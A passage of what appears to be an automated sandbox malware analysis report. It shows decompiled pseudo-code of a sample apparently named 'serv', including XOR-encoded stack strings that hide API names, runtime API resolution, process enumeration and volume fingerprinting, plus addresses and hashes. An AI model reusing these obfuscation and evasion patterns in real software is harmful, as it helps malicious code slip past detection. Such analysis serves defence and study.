                                                                    				if( *0x447ed4 == 0) {
                                                                    					_v23 = 0x14;
                                                                    					_v16 = 0x14;
                                                                    					_v20 = 0x1e;
                                                                    					_v12 = 0x1e;
                                                                    					_v6 = 0x1e;
                                                                    					 *_t49 = 0x36;
                                                                    					_v22 = 5;
                                                                    					_v21 = 0x27;
                                                                    					_v19 = 0x1d;
                                                                    					_v18 = 4;
                                                                    					_v17 = 0x1c;
                                                                    					_v15 = 0x38;
                                                                    					_v14 = 0x1f;
                                                                    					_v13 = 0x17;
                                                                    					_v11 = 3;
                                                                    					_v10 = 0x1c;
                                                                    					_v9 = 0x10;
                                                                    					_v8 = 5;
                                                                    					_v7 = 0x18;
                                                                    					_v5 = 0x1f;
                                                                    					_v4 = 0x30;
                                                                    					_v3 = 0x71;
                                                                    					_t35 = 0;
                                                                    					do {
                                                                    						 *(_t49 + _t35) =  *(_t49 + _t35) ^ 0x00000071;
                                                                    						_t35 = _t35 + 1;
                                                                    					} while (_t35 < 0x16);
                                                                    					 *0x447ed4 = E0041A600(_t49);
                                                                    				}
                                                                    				_t33 = GetVolumeInformationA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                                    				return _t33;
                                                                    			}



























                                                                    0x0041c4ba
                                                                    0x0041c4c4
                                                                    0x0041c4ca
                                                                    0x0041c4d0
                                                                    0x0041c4d4
                                                                    0x0041c4d8
                                                                    0x0041c4dc
                                                                    0x0041c4e0
                                                                    0x0041c4e5
                                                                    0x0041c4ea
                                                                    0x0041c4ef
                                                                    0x0041c4f4
                                                                    0x0041c4f8
                                                                    0x0041c4fd
                                                                    0x0041c501
                                                                    0x0041c506
                                                                    0x0041c50b
                                                                    0x0041c50f
                                                                    0x0041c514
                                                                    0x0041c519
                                                                    0x0041c51e
                                                                    0x0041c522
                                                                    0x0041c527
                                                                    0x0041c52c
                                                                    0x0041c530
                                                                    0x0041c530
                                                                    0x0041c534
                                                                    0x0041c535
                                                                    0x0041c546
                                                                    0x0041c546
                                                                    0x0041c573
                                                                    0x0041c578

                                                                    APIs
                                                                    • GetVolumeInformationA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000104,?,00000104,?), ref: 0041C573
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: InformationVolume
                                                                    • String ID: '$0$8$q
                                                                    • API String ID: 2039140958-2041056135
                                                                    • Opcode ID: 11767706456ff00db5666b542a5d2f970fa819257fba68606304a912862f68ab
                                                                    • Instruction ID: e180d019db639595498f584cfa77b6040d12cfce5590749267945b8108c98405
                                                                    • Opcode Fuzzy Hash: 11767706456ff00db5666b542a5d2f970fa819257fba68606304a912862f68ab
                                                                    • Instruction Fuzzy Hash: C221E76100E3C0AED302DB6C9544A8BBFD51BE6604F88DC8DF0C887242D6B9D949D763
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B640(void* _a4, struct tagPROCESSENTRY32W _a8) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				int _t19;
                                                                    				void* _t21;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				if( *0x447e6c == 0) {
                                                                    					_v11 = 0xd;
                                                                    					_v10 = 0xd;
                                                                    					 *_t27 = 0x2e;
                                                                    					_v15 = 0xc;
                                                                    					_v14 = 0x11;
                                                                    					_v13 = 0x1d;
                                                                    					_v12 = 0x1b;
                                                                    					_v9 = 0x4d;
                                                                    					_v8 = 0x4c;
                                                                    					_v7 = 0x30;
                                                                    					_v6 = 0x1b;
                                                                    					_v5 = 6;
                                                                    					_v4 = 0xa;
                                                                    					_v3 = 0x7e;
                                                                    					_t21 = 0;
                                                                    					do {
                                                                    						 *(_t27 + _t21) =  *(_t27 + _t21) ^ 0x0000007e;
                                                                    						_t21 = _t21 + 1;
                                                                    					} while (_t21 < 0xe);
                                                                    					 *0x447e6c = E0041A600(_t27);
                                                                    				}
                                                                    				_t19 = Process32Next(_a4, _a8); // executed
                                                                    				return _t19;
                                                                    			}



















                                                                    0x0041b64a
                                                                    0x0041b650
                                                                    0x0041b654
                                                                    0x0041b658
                                                                    0x0041b65c
                                                                    0x0041b661
                                                                    0x0041b666
                                                                    0x0041b66b
                                                                    0x0041b66f
                                                                    0x0041b674
                                                                    0x0041b679
                                                                    0x0041b67e
                                                                    0x0041b682
                                                                    0x0041b687
                                                                    0x0041b68c
                                                                    0x0041b691
                                                                    0x0041b693
                                                                    0x0041b693
                                                                    0x0041b697
                                                                    0x0041b698
                                                                    0x0041b6a9
                                                                    0x0041b6a9
                                                                    0x0041b6b8
                                                                    0x0041b6bd

                                                                    APIs
                                                                    • Process32Next.KERNEL32(?,?), ref: 0041B6B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: NextProcess32
                                                                    • String ID: 0$L$M$~
                                                                    • API String ID: 1850201408-628495139
                                                                    • Opcode ID: 98bc539f70c87affd1ab3b5424337ec7855001b499c9da39bcbcd222f110ff38
                                                                    • Instruction ID: 54d4f6761ee8fd97741eff34a0823defc637ddefc2f26b07a57b08d0b2e521e9
                                                                    • Opcode Fuzzy Hash: 98bc539f70c87affd1ab3b5424337ec7855001b499c9da39bcbcd222f110ff38
                                                                    • Instruction Fuzzy Hash: 5401256000D3C0AEE302D778C84878BBFD04BB2208F18CC9DE0D88B252D2B9D888C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00426055(signed int _a4, signed int _a8, long _a12) {
                                                                    				void _v5;
                                                                    				signed int _v12;
                                                                    				long _v16;
                                                                    				signed int _t79;
                                                                    				void* _t82;
                                                                    				int _t85;
                                                                    				signed int _t86;
                                                                    				signed int* _t89;
                                                                    				long _t90;
                                                                    				void* _t92;
                                                                    				intOrPtr _t93;
                                                                    				signed int _t97;
                                                                    				intOrPtr _t98;
                                                                    				char _t100;
                                                                    				signed int _t101;
                                                                    				long _t103;
                                                                    				long _t106;
                                                                    				signed int _t107;
                                                                    				signed int _t113;
                                                                    				signed int _t114;
                                                                    				signed char _t117;
                                                                    				intOrPtr _t118;
                                                                    				long _t120;
                                                                    				void* _t124;
                                                                    				intOrPtr* _t125;
                                                                    				signed int _t127;
                                                                    				signed char* _t128;
                                                                    				void* _t129;
                                                                    				void* _t130;
                                                                    
                                                                    				_v12 = _v12 & 0x00000000;
                                                                    				_t113 = _a8;
                                                                    				_t124 = _t113;
                                                                    				if(_a12 == 0) {
                                                                    					L42:
                                                                    					__eflags = 0;
                                                                    					return 0;
                                                                    				}
                                                                    				_t79 = _a4;
                                                                    				_t125 = 0x44b140 + (_t79 >> 5) * 4;
                                                                    				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
                                                                    				_t82 =  *_t125 + _t127;
                                                                    				_t117 =  *((intOrPtr*)(_t82 + 4));
                                                                    				if((_t117 & 0x00000002) != 0) {
                                                                    					goto L42;
                                                                    				}
                                                                    				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
                                                                    					_a12 = _a12 - 1;
                                                                    					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
                                                                    					_t20 = _t113 + 1; // 0x10d
                                                                    					_t124 = _t20;
                                                                    					_v12 = 1;
                                                                    					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
                                                                    				}
                                                                    				_t85 = ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0); // executed
                                                                    				if(_t85 != 0) {
                                                                    					_t86 = _v16;
                                                                    					_t118 =  *_t125;
                                                                    					_v12 = _v12 + _t86;
                                                                    					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
                                                                    					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
                                                                    						L41:
                                                                    						return _v12;
                                                                    					}
                                                                    					__eflags = _t86;
                                                                    					if(_t86 == 0) {
                                                                    						L15:
                                                                    						_t89 =  *_t125 + _t127 + 4;
                                                                    						 *_t89 =  *_t89 & 0x000000fb;
                                                                    						__eflags =  *_t89;
                                                                    						L16:
                                                                    						_t90 = _a8;
                                                                    						_t120 = _v12 + _t90;
                                                                    						__eflags = _t90 - _t120;
                                                                    						_a12 = _t90;
                                                                    						_v12 = _t120;
                                                                    						if(_t90 >= _t120) {
                                                                    							L40:
                                                                    							_t114 = _t113 - _a8;
                                                                    							__eflags = _t114;
                                                                    							_v12 = _t114;
                                                                    							goto L41;
                                                                    						} else {
                                                                    							goto L17;
                                                                    						}
                                                                    						while(1) {
                                                                    							L17:
                                                                    							_t92 =  *_a12;
                                                                    							__eflags = _t92 - 0x1a;
                                                                    							if(_t92 == 0x1a) {
                                                                    								break;
                                                                    							}
                                                                    							__eflags = _t92 - 0xd;
                                                                    							if(_t92 == 0xd) {
                                                                    								__eflags = _a12 - _t120 - 1;
                                                                    								if(_a12 >= _t120 - 1) {
                                                                    									_a12 = _a12 + 1;
                                                                    									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
                                                                    									__eflags = _t97;
                                                                    									if(_t97 != 0) {
                                                                    										L26:
                                                                    										__eflags = _v16;
                                                                    										if(_v16 == 0) {
                                                                    											L34:
                                                                    											 *_t113 = 0xd;
                                                                    											L35:
                                                                    											_t113 = _t113 + 1;
                                                                    											__eflags = _t113;
                                                                    											L36:
                                                                    											_t120 = _v12;
                                                                    											__eflags = _a12 - _t120;
                                                                    											if(_a12 < _t120) {
                                                                    												continue;
                                                                    											}
                                                                    											goto L40;
                                                                    										}
                                                                    										_t98 =  *_t125;
                                                                    										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
                                                                    										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
                                                                    											__eflags = _t113 - _a8;
                                                                    											if(__eflags != 0) {
                                                                    												L33:
                                                                    												E004284D0(__eflags, _a4, 0xffffffff, 1);
                                                                    												_t130 = _t130 + 0xc;
                                                                    												__eflags = _v5 - 0xa;
                                                                    												if(_v5 == 0xa) {
                                                                    													goto L36;
                                                                    												}
                                                                    												goto L34;
                                                                    											}
                                                                    											__eflags = _v5 - 0xa;
                                                                    											if(__eflags != 0) {
                                                                    												goto L33;
                                                                    											}
                                                                    											L32:
                                                                    											 *_t113 = 0xa;
                                                                    											goto L35;
                                                                    										}
                                                                    										_t100 = _v5;
                                                                    										__eflags = _t100 - 0xa;
                                                                    										if(_t100 == 0xa) {
                                                                    											goto L32;
                                                                    										}
                                                                    										 *_t113 = 0xd;
                                                                    										 *((char*)( *_t125 + _t127 + 5)) = _t100;
                                                                    										goto L35;
                                                                    									}
                                                                    									_t101 = GetLastError();
                                                                    									__eflags = _t101;
                                                                    									if(_t101 != 0) {
                                                                    										goto L34;
                                                                    									}
                                                                    									goto L26;
                                                                    								}
                                                                    								_t103 = _a12 + 1;
                                                                    								__eflags =  *_t103 - 0xa;
                                                                    								if( *_t103 != 0xa) {
                                                                    									_a12 = _t103;
                                                                    									goto L34;
                                                                    								}
                                                                    								_a12 = _a12 + 2;
                                                                    								goto L32;
                                                                    							}
                                                                    							 *_t113 = _t92;
                                                                    							_t113 = _t113 + 1;
                                                                    							_a12 = _a12 + 1;
                                                                    							goto L36;
                                                                    						}
                                                                    						_t93 =  *_t125;
                                                                    						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
                                                                    						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
                                                                    							_t128 = _t93 + _t127 + 4;
                                                                    							 *_t128 =  *_t128 | 0x00000002;
                                                                    							__eflags =  *_t128;
                                                                    						}
                                                                    						goto L40;
                                                                    					}
                                                                    					__eflags =  *_t113 - 0xa;
                                                                    					if( *_t113 != 0xa) {
                                                                    						goto L15;
                                                                    					}
                                                                    					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
                                                                    					goto L16;
                                                                    				} else {
                                                                    					_t106 = GetLastError();
                                                                    					_t129 = 5;
                                                                    					if(_t106 != _t129) {
                                                                    						__eflags = _t106 - 0x6d;
                                                                    						if(_t106 == 0x6d) {
                                                                    							goto L42;
                                                                    						}
                                                                    						_t107 = E00426868(_t106);
                                                                    						L10:
                                                                    						return _t107 | 0xffffffff;
                                                                    					}
                                                                    					 *((intOrPtr*)(E00426856())) = 9;
                                                                    					_t107 = E0042685F();
                                                                    					 *_t107 = _t129;
                                                                    					goto L10;
                                                                    				}
                                                                    			}
































                                                                    0x0042605b
                                                                    0x00426064
                                                                    0x00426069
                                                                    0x0042606b
                                                                    0x00426229
                                                                    0x00426229
                                                                    0x00000000
                                                                    0x00426229
                                                                    0x00426071
                                                                    0x0042607f
                                                                    0x00426088
                                                                    0x0042608b
                                                                    0x0042608d
                                                                    0x00426093
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042609c
                                                                    0x004260aa
                                                                    0x004260ad
                                                                    0x004260b1
                                                                    0x004260b1
                                                                    0x004260b4
                                                                    0x004260bb
                                                                    0x004260bb
                                                                    0x004260cf
                                                                    0x004260d7
                                                                    0x00426112
                                                                    0x00426115
                                                                    0x00426117
                                                                    0x0042611a
                                                                    0x0042611f
                                                                    0x00426224
                                                                    0x00000000
                                                                    0x00426224
                                                                    0x00426125
                                                                    0x00426127
                                                                    0x00426139
                                                                    0x0042613b
                                                                    0x0042613f
                                                                    0x0042613f
                                                                    0x00426142
                                                                    0x00426142
                                                                    0x00426148
                                                                    0x0042614a
                                                                    0x0042614c
                                                                    0x0042614f
                                                                    0x00426152
                                                                    0x0042621e
                                                                    0x0042621e
                                                                    0x0042621e
                                                                    0x00426221
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426158
                                                                    0x00426158
                                                                    0x0042615b
                                                                    0x0042615d
                                                                    0x0042615f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426165
                                                                    0x00426167
                                                                    0x00426175
                                                                    0x00426178
                                                                    0x0042618e
                                                                    0x004261a2
                                                                    0x004261a8
                                                                    0x004261aa
                                                                    0x004261b6
                                                                    0x004261b6
                                                                    0x004261ba
                                                                    0x004261fc
                                                                    0x004261fc
                                                                    0x004261ff
                                                                    0x004261ff
                                                                    0x004261ff
                                                                    0x00426200
                                                                    0x00426200
                                                                    0x00426203
                                                                    0x00426206
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042620c
                                                                    0x004261bc
                                                                    0x004261be
                                                                    0x004261c3
                                                                    0x004261d7
                                                                    0x004261da
                                                                    0x004261e7
                                                                    0x004261ee
                                                                    0x004261f3
                                                                    0x004261f6
                                                                    0x004261fa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261fa
                                                                    0x004261dc
                                                                    0x004261e0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261e2
                                                                    0x004261e2
                                                                    0x00000000
                                                                    0x004261e2
                                                                    0x004261c5
                                                                    0x004261c8
                                                                    0x004261ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261cc
                                                                    0x004261d1
                                                                    0x00000000
                                                                    0x004261d1
                                                                    0x004261ac
                                                                    0x004261b2
                                                                    0x004261b4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261b4
                                                                    0x0042617d
                                                                    0x0042617e
                                                                    0x00426181
                                                                    0x00426189
                                                                    0x00000000
                                                                    0x00426189
                                                                    0x00426183
                                                                    0x00000000
                                                                    0x00426183
                                                                    0x00426169
                                                                    0x0042616b
                                                                    0x0042616c
                                                                    0x00000000
                                                                    0x0042616c
                                                                    0x0042620e
                                                                    0x00426210
                                                                    0x00426215
                                                                    0x00426217
                                                                    0x0042621b
                                                                    0x0042621b
                                                                    0x0042621b
                                                                    0x00000000
                                                                    0x00426215
                                                                    0x00426129
                                                                    0x0042612c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426134
                                                                    0x00000000
                                                                    0x004260d9
                                                                    0x004260d9
                                                                    0x004260e1
                                                                    0x004260e4
                                                                    0x004260fa
                                                                    0x004260fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426104
                                                                    0x0042610a
                                                                    0x00000000
                                                                    0x0042610a
                                                                    0x004260eb
                                                                    0x004260f1
                                                                    0x004260f6
                                                                    0x00000000
                                                                    0x004260f6

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(0000010C,0000010C,00000000,0000010C,00000000,?,?,?), ref: 004260CF
                                                                    • GetLastError.KERNEL32 ref: 004260D9
                                                                    • ReadFile.KERNEL32(?,?,00000001,0000010C,00000000), ref: 004261A2
                                                                    • GetLastError.KERNEL32 ref: 004261AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastRead
                                                                    • String ID:
                                                                    • API String ID: 1948546556-0
                                                                    • Opcode ID: ef4583aba19ade5e5d45f1483a8a9fc4a23778b4dd0ebdcbea22c49f752c4172
                                                                    • Instruction ID: 617016fc832f5af361c6ab2712e38a0be7f137b163cf5149b806dd52470be273
                                                                    • Opcode Fuzzy Hash: ef4583aba19ade5e5d45f1483a8a9fc4a23778b4dd0ebdcbea22c49f752c4172
                                                                    • Instruction Fuzzy Hash: C661F8307043A5DFDB21CF58E884BAA7BB0BF01304F96459BE8658B392C778D951CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00561647(signed int* _a4, intOrPtr _a8) {
                                                                    				char _v5;
                                                                    				signed int _v12;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				signed int* _v28;
                                                                    				signed int _v32;
                                                                    				char _v160;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t44;
                                                                    				void* _t45;
                                                                    				signed int _t49;
                                                                    				CHAR* _t57;
                                                                    				int _t59;
                                                                    				signed int _t61;
                                                                    				signed int _t64;
                                                                    				void* _t71;
                                                                    				signed short _t76;
                                                                    				signed int _t79;
                                                                    				signed int _t83;
                                                                    				void* _t94;
                                                                    				signed int* _t103;
                                                                    				signed int _t105;
                                                                    				void* _t107;
                                                                    				signed int* _t108;
                                                                    				signed int _t109;
                                                                    				void* _t110;
                                                                    				void* _t111;
                                                                    
                                                                    				_t44 =  *0x563228; // 0x980
                                                                    				_t103 = _a4;
                                                                    				_t71 = 0xffffffde;
                                                                    				_t105 = 0;
                                                                    				_t76 = (_t71 - _t44 & 0x00000060) * 0x13 + _t44 - 0x75a1;
                                                                    				_v28 = _t103;
                                                                    				_v32 = 0;
                                                                    				_v12 = 0;
                                                                    				if(_a8 >= 0xc0) {
                                                                    					do {
                                                                    						_t45 = 7;
                                                                    						_t76 = _t76 + (_t45 - _t76 & 0x00000060) * 0x13;
                                                                    						if(_t103[0xf] != _t105) {
                                                                    							E00561D92();
                                                                    							 *0x56322c =  *0x56322c & _t76;
                                                                    							wsprintfA( &_v160, E00561010, _t103[0xf]);
                                                                    							_v5 = 0xd0;
                                                                    							_v24 = 0xa3;
                                                                    							_v23 = 0xb5;
                                                                    							_v22 = 0xa2;
                                                                    							_v21 = 0xa6;
                                                                    							_v20 = 0xfe;
                                                                    							_v19 = 0xb5;
                                                                    							_v18 = 0xa8;
                                                                    							_v17 = 0xb5;
                                                                    							_v16 = 0xd0;
                                                                    							_t57 = E00561578( &_v24,  &_v5, 9);
                                                                    							_t111 = _t111 + 0x14;
                                                                    							_t107 = 0; // executed
                                                                    							_t59 = lstrcmpiA( &_v160, _t57); // executed
                                                                    							if(_t59 == 0) {
                                                                    								_t107 = 1;
                                                                    							}
                                                                    							 *0x563224 =  *0x563224 + 0x15d5;
                                                                    							if(_t107 != 0) {
                                                                    								_t108 = _v32;
                                                                    								if(_t108 != 0) {
                                                                    									 *0x563230 =  *0x563230 + 0x1644;
                                                                    									_t61 =  *_t103;
                                                                    									if(_t61 != 0) {
                                                                    										 *_t108 =  *_t108 + _t61;
                                                                    									} else {
                                                                    										 *_t108 =  *_t108 & _t61;
                                                                    									}
                                                                    									_t109 =  *0x563224; // 0xffc7114f
                                                                    									if(_v12 < 0x40) {
                                                                    										E00561542(_t109, 0x56322c, 0);
                                                                    										_v12 = _v12 + 1;
                                                                    										_t103 = _v28;
                                                                    										 *(_t110 + _v12 * 4 - 0x19c) = _v28[0x11];
                                                                    									}
                                                                    									_t64 = _t76 -  *0x563230 * 0x0000003b | _t109 & _t76;
                                                                    									_t94 = 0x12;
                                                                    									do {
                                                                    										_t109 = _t109 + (_t64 | _t109);
                                                                    										_t94 = _t94 - 1;
                                                                    									} while (_t94 != 0);
                                                                    									 *0x563224 = _t109;
                                                                    								}
                                                                    							} else {
                                                                    								if(_t76 >= 0x59) {
                                                                    									_t76 = _t76 - 0x29;
                                                                    								} else {
                                                                    									_t76 = _t76 ^ 0x00000040;
                                                                    								}
                                                                    								_v32 = _t103;
                                                                    							}
                                                                    						}
                                                                    						_t49 =  *0x56322c; // 0xf7dc
                                                                    						_t79 =  *0x563228; // 0x980
                                                                    						_t78 = ( ~_t79 - _t49 * 0x0000001f & 0x00000060) * 0x13;
                                                                    						 *0x563228 =  *0x563228 + ( ~_t79 - _t49 * 0x0000001f & 0x00000060) * 0x13;
                                                                    						_t44 =  *_t103;
                                                                    						_t105 = 0;
                                                                    						if(_t44 != 0) {
                                                                    							goto L19;
                                                                    						}
                                                                    						goto L20;
                                                                    						L19:
                                                                    						_t83 =  *0x563230; // 0x1644
                                                                    						_t78 = _t83 * 0x1f;
                                                                    						_t103 = _t103 + _t44;
                                                                    						_t44 = _t103 - _a4 + 0xc0;
                                                                    						_t76 = _t76 + ( ~_t76 - _t83 * 0x0000001f & 0x00000060) * 0x13 - 0x75a1;
                                                                    						_v28 = _t103;
                                                                    					} while (_t44 <= _a8);
                                                                    				}
                                                                    				L20:
                                                                    				if(_v12 > _t105) {
                                                                    					do {
                                                                    						 *0x56322c =  *0x56322c | _t76;
                                                                    						_t44 = E005615AC(_t78, _a4, _a8,  *((intOrPtr*)(_t110 + _t105 * 4 - 0x19c)));
                                                                    						_t111 = _t111 + 0xc;
                                                                    						_t105 = _t105 + 1;
                                                                    					} while (_t105 < _v12);
                                                                    				}
                                                                    				return _t44;
                                                                    			}






































                                                                    0x00561650
                                                                    0x00561658
                                                                    0x0056165d
                                                                    0x00561668
                                                                    0x0056166a
                                                                    0x00561677
                                                                    0x0056167a
                                                                    0x0056167d
                                                                    0x00561680
                                                                    0x00561686
                                                                    0x00561688
                                                                    0x00561691
                                                                    0x00561696
                                                                    0x0056169c
                                                                    0x005616a1
                                                                    0x005616b7
                                                                    0x005616c6
                                                                    0x005616ca
                                                                    0x005616ce
                                                                    0x005616d2
                                                                    0x005616d6
                                                                    0x005616da
                                                                    0x005616de
                                                                    0x005616e2
                                                                    0x005616e6
                                                                    0x005616ea
                                                                    0x005616ee
                                                                    0x005616f3
                                                                    0x005616fe
                                                                    0x00561700
                                                                    0x00561708
                                                                    0x0056170a
                                                                    0x0056170a
                                                                    0x0056170b
                                                                    0x00561717
                                                                    0x0056172e
                                                                    0x00561733
                                                                    0x00561753
                                                                    0x0056175a
                                                                    0x0056175e
                                                                    0x00561764
                                                                    0x00561760
                                                                    0x00561760
                                                                    0x00561760
                                                                    0x0056176a
                                                                    0x00561770
                                                                    0x00561782
                                                                    0x00561790
                                                                    0x00561793
                                                                    0x00561796
                                                                    0x00561796
                                                                    0x005617b1
                                                                    0x005617b3
                                                                    0x005617b4
                                                                    0x005617b8
                                                                    0x005617ba
                                                                    0x005617ba
                                                                    0x005617bd
                                                                    0x005617bd
                                                                    0x00561719
                                                                    0x0056171c
                                                                    0x00561723
                                                                    0x0056171e
                                                                    0x0056171e
                                                                    0x0056171e
                                                                    0x00561726
                                                                    0x00561726
                                                                    0x00561717
                                                                    0x005617c3
                                                                    0x005617c8
                                                                    0x005617d8
                                                                    0x005617db
                                                                    0x005617e1
                                                                    0x005617e3
                                                                    0x005617e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005617e9
                                                                    0x005617e9
                                                                    0x005617ef
                                                                    0x005617fe
                                                                    0x00561807
                                                                    0x0056180c
                                                                    0x00561815
                                                                    0x00561815
                                                                    0x00561686
                                                                    0x0056181e
                                                                    0x00561821
                                                                    0x00561823
                                                                    0x0056182a
                                                                    0x00561837
                                                                    0x0056183c
                                                                    0x0056183f
                                                                    0x00561840
                                                                    0x00561823
                                                                    0x00561849

                                                                    APIs
                                                                      • Part of subcall function 00561D92: LoadLibraryA.KERNEL32(00000027), ref: 00561DDC
                                                                      • Part of subcall function 00561D92: GetProcAddress.KERNEL32(775C0000,8KHJQVL^y8), ref: 00561E2A
                                                                    • wsprintfA.USER32 ref: 005616B7
                                                                    • lstrcmpiA.KERNEL32(?,00000000), ref: 00561700
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProclstrcmpiwsprintf
                                                                    • String ID: ,2V$@
                                                                    • API String ID: 1638720216-1999959814
                                                                    • Opcode ID: c7407c6b296c582ea6292748ff7b322c94fc46cf81bd9dd9930f839a8fd5f39f
                                                                    • Instruction ID: 67db64db6cc08231f2a01a898deb2ef2f17909aee81e6de4dcfe7f38ccbf8d63
                                                                    • Opcode Fuzzy Hash: c7407c6b296c582ea6292748ff7b322c94fc46cf81bd9dd9930f839a8fd5f39f
                                                                    • Instruction Fuzzy Hash: 1B510872E0071ADBCB24CF7CDC955BDBFB4BB64720F188269E4529B291D3708A458B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004285EF(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                    				intOrPtr _t68;
                                                                    				void** _t73;
                                                                    				int _t74;
